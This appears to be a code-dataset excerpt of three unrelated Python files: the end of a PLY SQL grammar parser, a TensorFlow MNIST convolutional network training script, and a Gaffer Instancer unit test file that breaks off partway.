reporte_gramatical.append("<DATETIME> ::= \"SECOND\"")
t[0] = 'SECOND'
def p_DateTimeMonth(t):
'DATETIME : MONTH '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"MONTH\"")
t[0] = 'MONTH'
def p_DateTimeDay(t):
'DATETIME : DAY '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"DAY\"")
t[0] = 'DAY'
def p_FuncionesWhereExist(t):
'FUNCIONES_WHERE : EXISTS PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= \"EXISTS\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Exists(t[3].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('EXISTS'))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_FuncionesWhereIn(t):
'FUNCIONES_WHERE : CONDICION IN PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"IN\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(In(t[1].getInstruccion(), t[4].getInstruccion(), True), NodoAST('IN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_FuncionesWhereNotIn(t):
'FUNCIONES_WHERE : CONDICION NOT IN PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"NOT\" \"IN\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(In(t[1].getInstruccion(), t[5].getInstruccion(), False), NodoAST('NOT IN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesWhereAny(t):
'FUNCIONES_WHERE : CONDICION OPERATOR_FW ANY PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> <OPERATOR_FW> \"ANY\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Any_op(t[1].getInstruccion(), t[2], 'ANY', t[5].getInstruccion()), NodoAST(t[2]))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST('ANY'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesWhereAll(t):
'FUNCIONES_WHERE : CONDICION OPERATOR_FW ALL PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> <OPERATOR_FW> \"ALL\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Any_op(t[1].getInstruccion(), t[2], 'ALL', t[5].getInstruccion()), NodoAST(t[2]))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST('ALL'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesWhereSome(t):
'FUNCIONES_WHERE : CONDICION OPERATOR_FW SOME PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> <OPERATOR_FW> \"SOME\" \"(\" <SUBCONSULTA> \")\"")
ret = Retorno(Any_op(t[1].getInstruccion(), t[2], 'SOME', t[5].getInstruccion()), NodoAST(t[2]))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST('SOME'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesWhereLike(t):
'FUNCIONES_WHERE : CONDICION LIKE CADENA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"LIKE\" \"CADENA\"")
ret = Retorno(Like(t[1].getInstruccion(), t[3], True), NodoAST('LIKE'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_FuncionesWhereNotLike(t):
'FUNCIONES_WHERE : CONDICION NOT LIKE CADENA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_WHERE> ::= <CONDICION> \"NOT\" \"LIKE\" \"CADENA\"")
ret = Retorno(Like(t[1].getInstruccion(), t[3], False), NodoAST('NOT LIKE'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(t[4]))
t[0] = ret
def p_OperatorFwMenor(t):
'OPERATOR_FW : MENOR '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwMayor(t):
'OPERATOR_FW : MAYOR '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwMenorIgual(t):
'OPERATOR_FW : MENORIGUAL '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwMayorIgual(t):
'OPERATOR_FW : MAYORIGUAL '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwIgual(t):
'OPERATOR_FW : IGUAL '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwDif(t):
'OPERATOR_FW : DIF '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_OperatorFwDif1(t):
'OPERATOR_FW : DIF1 '
global reporte_gramatical
reporte_gramatical.append("<OPERATOR_FW> ::= \"" + str(t[1]) + "\"")
t[0] = t[1]
def p_PTimestamC(t):
'PTIMESTAMP : TIMESTAMP CADENA '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"TIMESTAMP\" \"CADENA\"")
ret = Retorno(Cadena(t[2]), NodoAST(t[2]))
t[0] = ret
def p_PTimestamId(t):
'PTIMESTAMP : TIMESTAMP ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"TIMESTAMP\" \"ID\"")
ret = Retorno(Id(t[2], None), NodoAST(t[2]))
t[0] = ret
def p_PTimestamIdPId(t):
'PTIMESTAMP : TIMESTAMP ID PUNTO ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"TIMESTAMP\" \"ID\" \".\" \"ID\"")
ret = Retorno(Id(t[4], t[2]), NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[2]))
ret.getNodo().setHijo(NodoAST(t[4]))
def p_PTimestamCadena(t):
'PTIMESTAMP : CADENA '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"CADENA\"")
ret = Retorno(Cadena(t[1]), NodoAST(t[1]))
t[0] = ret
def p_PTimestamId1(t):
'PTIMESTAMP : ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"ID\"")
ret = Retorno(Id(t[1], None), NodoAST(t[1]))
t[0] = ret
def p_PTimestamIdP(t):
'PTIMESTAMP : ID PUNTO ID '
global reporte_gramatical
reporte_gramatical.append("<PTIMESTAMP> ::= \"ID\" \".\" \"ID\"")
ret = Retorno(Id(t[3], t[1]), NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
def p_empty(t):
'EMPTY :'
def p_error(t):
global counter_syntactic_error
err = open("reports/error_syntactic.txt", "a+")
txt = '<tr><td>' + str(counter_syntactic_error) + '</td>'
txt += '<td>' + str(t.value) + '</td>'
txt += '<td>' + 'Texto ingresado no reconocido.' + '</td>'
txt += '<td>' + str(t.lexer.lineno) + '</td>'
txt += '<td>' + str(get_column(t.lexer.lexdata, t)) + '</td><tr>\n'
err.write(txt)
err.close()
counter_syntactic_error += 1
if not t:
return
while True:
entry = parser.token()
if not entry or entry.type == 'RBRACE':
break
parser.restart()
# START PARSING THE INPUT TEXT
parser = yacc.yacc()
def parse(p_input):
global counter_lexical_error, counter_syntactic_error
counter_lexical_error = 1
counter_syntactic_error = 1
return parser.parse(p_input)
|
py | 1a4baa080c227c90f7a54f4fd8ce69901954e1eb | import numpy as np
import os
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def conv_layer(input, shape):
W = weight_variable(shape)
b = bias_variable([shape[3]])
return tf.nn.relu(conv2d(input, W) + b)
def full_layer(input, size):
in_size = int(input.get_shape()[1])
W = weight_variable([in_size, size])
b = bias_variable([size])
return tf.matmul(input, W) + b
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
x_image = tf.reshape(x, [-1, 28, 28, 1])
conv1 = conv_layer(x_image, shape=[5, 5, 1, 32])
conv1_pool = max_pool_2x2(conv1)
conv2 = conv_layer(conv1_pool, shape=[5, 5, 32, 64])
conv2_pool = max_pool_2x2(conv2)
conv2_flat = tf.reshape(conv2_pool, [-1, 7*7*64])
full_1 = tf.nn.relu(full_layer(conv2_flat, 1024))
keep_prob = tf.placeholder(tf.float32)
full1_drop = tf.nn.dropout(full_1, keep_prob=keep_prob)
y_conv = full_layer(full1_drop, 10)
DATA_DIR = '../data/MNIST_DATA'
NUM_STEPS = 1000
MINIBATCH_SIZE = 50
mnist = input_data.read_data_sets(DATA_DIR, one_hot=True)
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv, labels=y_))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(NUM_STEPS):
batch = mnist.train.next_batch(MINIBATCH_SIZE)
if i % 100==0:
train_accuracy = sess.run(accuracy, feed_dict={x: batch[0], y_: batch[1],
keep_prob: 1.0})
print("step {}, training accuracy {}".format(i, train_accuracy))
sess.run(train_step, feed_dict={x: batch[0], y_: batch[1],
keep_prob: 0.5})
X = mnist.test.images.reshape(10, 1000, 784)
Y = mnist.test.labels.reshape(10, 1000, 10)
test_accuracy = np.mean([
sess.run(accuracy, feed_dict={x:X[i], y_:Y[i], keep_prob:1.0}) for i in range(10)
])
print("test accuracy: {}".format(test_accuracy))
|
py | 1a4baac47315f5acfac844e9104e88e2abbe6954 | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import imath
import inspect
import six
import time
import unittest
import IECore
import IECoreScene
import Gaffer
import GafferTest
import GafferDispatch
import GafferScene
import GafferSceneTest
class InstancerTest( GafferSceneTest.SceneTestCase ) :
def test( self ) :
sphere = IECoreScene.SpherePrimitive()
instanceInput = GafferSceneTest.CompoundObjectSource()
instanceInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( -2 ), imath.V3f( 2 ) ) ),
"children" : {
"sphere" : {
"object" : sphere,
"bound" : IECore.Box3fData( sphere.bound() ),
"transform" : IECore.M44fData( imath.M44f().scale( imath.V3f( 2 ) ) ),
},
}
} )
)
seeds = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( 1, 0, 0 ), imath.V3f( 1, 1, 0 ), imath.V3f( 0, 1, 0 ), imath.V3f( 0, 0, 0 ) ]
)
)
seedsInput = GafferSceneTest.CompoundObjectSource()
seedsInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( 1, 0, 0 ), imath.V3f( 2, 1, 0 ) ) ),
"children" : {
"seeds" : {
"bound" : IECore.Box3fData( seeds.bound() ),
"transform" : IECore.M44fData( imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) ),
"object" : seeds,
},
},
}, )
)
instancer = GafferScene.Instancer()
instancer["in"].setInput( seedsInput["out"] )
instancer["prototypes"].setInput( instanceInput["out"] )
instancer["parent"].setValue( "/seeds" )
instancer["name"].setValue( "instances" )
self.assertEqual( instancer["out"].object( "/" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/" ), imath.M44f() )
self.assertEqual( instancer["out"].bound( "/" ), imath.Box3f( imath.V3f( -1, -2, -2 ), imath.V3f( 4, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "seeds" ] ) )
self.assertEqual( instancer["out"].object( "/seeds" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/seeds" ), imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) )
self.assertEqual( instancer["out"].bound( "/seeds" ), imath.Box3f( imath.V3f( -2, -2, -2 ), imath.V3f( 3, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/seeds" ), IECore.InternedStringVectorData( [ "instances" ] ) )
self.assertEqual( instancer["out"].object( "/seeds/instances" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/seeds/instances" ), imath.M44f() )
self.assertEqual( instancer["out"].bound( "/seeds/instances" ), imath.Box3f( imath.V3f( -2, -2, -2 ), imath.V3f( 3, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/seeds/instances" ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( instancer["out"].object( "/seeds/instances/sphere" ), IECore.NullObject() )
self.assertEqual( instancer["out"].transform( "/seeds/instances/sphere" ), imath.M44f() )
self.assertEqual( instancer["out"].bound( "/seeds/instances/sphere" ), imath.Box3f( imath.V3f( -2, -2, -2 ), imath.V3f( 3, 3, 2 ) ) )
self.assertEqual( instancer["out"].childNames( "/seeds/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "1", "2", "3" ] ) )
for i in range( 0, 4 ) :
instancePath = "/seeds/instances/sphere/%d" % i
self.assertEqual( instancer["out"].object( instancePath ), sphere )
self.assertEqual(
instancer["out"].transform( instancePath ),
imath.M44f().scale( imath.V3f( 2 ) ) * imath.M44f().translate( seeds["P"].data[i] )
)
self.assertEqual( instancer["out"].bound( instancePath ), sphere.bound() )
self.assertEqual( instancer["out"].childNames( instancePath ), IECore.InternedStringVectorData() )
# Test paths that don't exist - the transform will trigger an error, the other functions don't depend on
# the index, so will just return a reasonable value
six.assertRaisesRegex( self,
Gaffer.ProcessException,
'Instancer.out.transform : Instance id "77" is invalid, instancer produces only 4 children. Topology may have changed during shutter.',
instancer["out"].transform, "/seeds/instances/sphere/77"
)
self.assertEqual( instancer["out"].object( "/seeds/instances/sphere/77" ), sphere )
self.assertEqual( instancer["out"].bound( "/seeds/instances/sphere/77" ), sphere.bound() )
self.assertEqual( instancer["out"].childNames( "/seeds/instances/sphere/77" ), IECore.InternedStringVectorData() )
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
instancer["enabled"].setValue( True )
# Test encapsulation options
encapInstancer = GafferScene.Instancer()
encapInstancer["in"].setInput( seedsInput["out"] )
encapInstancer["prototypes"].setInput( instanceInput["out"] )
encapInstancer["parent"].setValue( "/seeds" )
encapInstancer["name"].setValue( "instances" )
encapInstancer["encapsulateInstanceGroups"].setValue( True )
unencapFilter = GafferScene.PathFilter()
unencapFilter["paths"].setValue( IECore.StringVectorData( [ "/..." ] ) )
unencap = GafferScene.Unencapsulate()
unencap["in"].setInput( encapInstancer["out"] )
unencap["filter"].setInput( unencapFilter["out"] )
self.assertTrue( isinstance( encapInstancer["out"].object( "/seeds/instances/sphere/" ), GafferScene.Capsule ) )
self.assertEqual( encapInstancer["out"].childNames( "/seeds/instances/sphere/" ), IECore.InternedStringVectorData() )
self.assertScenesEqual( unencap["out"], instancer["out"] )
# Edit seeds object
freezeTransform = GafferScene.FreezeTransform()
freezeTransform["in"].setInput( seedsInput["out"] )
freezeTransform["filter"].setInput( unencapFilter["out"] )
instancer["in"].setInput( freezeTransform["out"] )
encapInstancer["in"].setInput( freezeTransform["out"] )
self.assertScenesEqual( unencap["out"], instancer["out"] )
# Then set it back ( to make sure that returning to a previously cached value after
# changing the seeds doesn't pull an expired Capsule out of the cache )
freezeTransform["enabled"].setValue( False )
self.assertScenesEqual( unencap["out"], instancer["out"] )
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
def testThreading( self ) :
sphere = IECoreScene.SpherePrimitive()
instanceInput = GafferSceneTest.CompoundObjectSource()
instanceInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( -2 ), imath.V3f( 2 ) ) ),
"children" : {
"sphere" : {
"object" : sphere,
"bound" : IECore.Box3fData( sphere.bound() ),
"transform" : IECore.M44fData( imath.M44f().scale( imath.V3f( 2 ) ) ),
},
}
} )
)
seeds = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( 1, 0, 0 ), imath.V3f( 1, 1, 0 ), imath.V3f( 0, 1, 0 ), imath.V3f( 0, 0, 0 ) ]
)
)
seedsInput = GafferSceneTest.CompoundObjectSource()
seedsInput["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( imath.Box3f( imath.V3f( 1, 0, 0 ), imath.V3f( 2, 1, 0 ) ) ),
"children" : {
"seeds" : {
"bound" : IECore.Box3fData( seeds.bound() ),
"transform" : IECore.M44fData( imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) ),
"object" : seeds,
},
},
}, )
)
instancer = GafferScene.Instancer()
instancer["in"].setInput( seedsInput["out"] )
instancer["prototypes"].setInput( instanceInput["out"] )
instancer["parent"].setValue( "/seeds" )
instancer["name"].setValue( "instances" )
GafferSceneTest.traverseScene( instancer["out"] )
def testNamePlugDefaultValue( self ) :
n = GafferScene.Instancer()
self.assertEqual( n["name"].defaultValue(), "instances" )
self.assertEqual( n["name"].getValue(), "instances" )
def testAffects( self ) :
n = GafferScene.Instancer()
a = n.affects( n["name"] )
self.assertGreaterEqual( { x.relativeName( n ) for x in a }, { "out.childNames", "out.bound", "out.set" } )
def testParentBoundsWhenNoInstances( self ) :
sphere = GafferScene.Sphere()
sphere["type"].setValue( sphere.Type.Primitive ) # no points, so we can't instance onto it
instancer = GafferScene.Instancer()
instancer["in"].setInput( sphere["out"] )
instancer["parent"].setValue( "/sphere" )
instancer["prototypes"].setInput( sphere["out"] )
self.assertSceneValid( instancer["out"] )
self.assertEqual( instancer["out"].bound( "/sphere" ), sphere["out"].bound( "/sphere" ) )
def testEmptyName( self ) :
plane = GafferScene.Plane()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["parent"].setValue( "/plane" )
instancer["name"].setValue( "" )
f = GafferScene.PathFilter()
f["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
deleteObject = GafferScene.DeleteObject()
deleteObject["in"].setInput( plane["out"] )
deleteObject["filter"].setInput( f["out"] )
self.assertScenesEqual( instancer["out"], deleteObject["out"] )
def testEmptyParent( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "" )
self.assertScenesEqual( instancer["out"], plane["out"] )
self.assertSceneHashesEqual( instancer["out"], plane["out"] )
def testSeedsAffectBound( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
h1 = instancer["out"].boundHash( "/plane/instances" )
b1 = instancer["out"].bound( "/plane/instances" )
plane["dimensions"].setValue( plane["dimensions"].getValue() * 2 )
h2 = instancer["out"].boundHash( "/plane/instances" )
b2 = instancer["out"].bound( "/plane/instances" )
self.assertNotEqual( h1, h2 )
self.assertNotEqual( b1, b2 )
def testBoundHashIsStable( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
h = instancer["out"].boundHash( "/plane/instances" )
for i in range( 0, 100 ) :
self.assertEqual( instancer["out"].boundHash( "/plane/instances" ), h )
def testObjectAffectsChildNames( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
cs = GafferTest.CapturingSlot( instancer.plugDirtiedSignal() )
plane["divisions"]["x"].setValue( 2 )
dirtiedPlugs = [ s[0] for s in cs ]
self.assertTrue( instancer["out"]["childNames"] in dirtiedPlugs )
self.assertTrue( instancer["out"]["bound"] in dirtiedPlugs )
self.assertTrue( instancer["out"]["transform"] in dirtiedPlugs )
def testPythonExpressionAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
# The Instancer spawns its own threads, so if we don't release the GIL
# when invoking it, and an upstream node enters Python, we'll end up
# with a deadlock. Test that isn't the case. We increment the frame
# between each test to ensure the expression result is not cached and
# we do truly enter python.
with Gaffer.Context() as c :
c.setFrame( 1 )
script["instancer"]["out"]["globals"].getValue()
c.setFrame( 101 )
script["instancer"]["out"]["globals"].hash()
c["scene:path"] = IECore.InternedStringVectorData( [ "plane" ] )
c.setFrame( 2 )
script["instancer"]["out"]["bound"].getValue()
c.setFrame( 3 )
script["instancer"]["out"]["transform"].getValue()
c.setFrame( 4 )
script["instancer"]["out"]["object"].getValue()
c.setFrame( 5 )
script["instancer"]["out"]["attributes"].getValue()
c.setFrame( 6 )
script["instancer"]["out"]["childNames"].getValue()
c.setFrame( 7 )
c.setFrame( 102 )
script["instancer"]["out"]["bound"].hash()
c.setFrame( 103 )
script["instancer"]["out"]["transform"].hash()
c.setFrame( 104 )
script["instancer"]["out"]["object"].hash()
c.setFrame( 105 )
script["instancer"]["out"]["attributes"].hash()
c.setFrame( 106 )
script["instancer"]["out"]["childNames"].hash()
c.setFrame( 107 )
# The same applies for the higher level helper functions on ScenePlug
c.setFrame( 200 )
script["instancer"]["out"].bound( "/plane" )
c.setFrame( 201 )
script["instancer"]["out"].transform( "/plane" )
c.setFrame( 202 )
script["instancer"]["out"].fullTransform( "/plane" )
c.setFrame( 203 )
script["instancer"]["out"].attributes( "/plane" )
c.setFrame( 204 )
script["instancer"]["out"].fullAttributes( "/plane" )
c.setFrame( 205 )
script["instancer"]["out"].object( "/plane" )
c.setFrame( 206 )
script["instancer"]["out"].childNames( "/plane" )
c.setFrame( 207 )
c.setFrame( 300 )
script["instancer"]["out"].boundHash( "/plane" )
c.setFrame( 301 )
script["instancer"]["out"].transformHash( "/plane" )
c.setFrame( 302 )
script["instancer"]["out"].fullTransformHash( "/plane" )
c.setFrame( 303 )
script["instancer"]["out"].attributesHash( "/plane" )
c.setFrame( 304 )
script["instancer"]["out"].fullAttributesHash( "/plane" )
c.setFrame( 305 )
script["instancer"]["out"].objectHash( "/plane" )
c.setFrame( 306 )
script["instancer"]["out"].childNamesHash( "/plane" )
c.setFrame( 307 )
def testDynamicPlugsAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
script["attributes"] = GafferScene.CustomAttributes()
script["attributes"]["in"].setInput( script["instancer"]["out"] )
script["outputs"] = GafferScene.Outputs()
script["outputs"]["in"].setInput( script["attributes"]["out"] )
# Simulate an InteractiveRender or Viewer traversal of the scene
# every time it is dirtied. If the GIL isn't released when dirtiness
# is signalled, we'll end up with a deadlock as the traversal enters
# python on another thread to evaluate the expression. We increment the frame
# between each test to ensure the expression result is not cached and
# we do truly enter python.
traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToPlugDirtiedSignal( script["outputs"]["out"] ) )
with Gaffer.Context() as c :
c.setFrame( 1 )
script["attributes"]["attributes"].addChild( Gaffer.NameValuePlug( "test1", IECore.IntData( 10 ) ) )
c.setFrame( 2 )
script["attributes"]["attributes"].addChild( Gaffer.NameValuePlug( "test2", IECore.IntData( 20 ), True ) )
c.setFrame( 3 )
script["attributes"]["attributes"].addMembers(
IECore.CompoundData( {
"test3" : 30,
"test4" : 40,
} )
)
c.setFrame( 4 )
p = script["attributes"]["attributes"][0]
del script["attributes"]["attributes"][p.getName()]
c.setFrame( 5 )
script["attributes"]["attributes"].addChild( p )
c.setFrame( 6 )
script["attributes"]["attributes"].removeChild( p )
c.setFrame( 7 )
script["attributes"]["attributes"].setChild( p.getName(), p )
c.setFrame( 8 )
script["attributes"]["attributes"].removeChild( p )
c.setFrame( 9 )
script["attributes"]["attributes"][p.getName()] = p
c.setFrame( 10 )
script["outputs"].addOutput( "test", IECoreScene.Output( "beauty.exr", "exr", "rgba" ) )
def testLoadReferenceAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = 0.1 + context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
script["box"] = Gaffer.Box()
script["box"]["in"] = GafferScene.ScenePlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
script["box"]["out"] = GafferScene.ScenePlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
script["box"]["out"].setInput( script["box"]["in"] )
script["box"].exportForReference( self.temporaryDirectory() + "/test.grf" )
script["reference"] = Gaffer.Reference()
script["reference"].load( self.temporaryDirectory() + "/test.grf" )
script["reference"]["in"].setInput( script["instancer"]["out"] )
script["attributes"] = GafferScene.CustomAttributes()
script["attributes"]["in"].setInput( script["reference"]["out"] )
traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToPlugDirtiedSignal( script["attributes"]["out"] ) )
with Gaffer.Context() as c :
script["reference"].load( self.temporaryDirectory() + "/test.grf" )
def testContextChangedAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.get( 'minRadius', 0.1 ) + context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
context = Gaffer.Context()
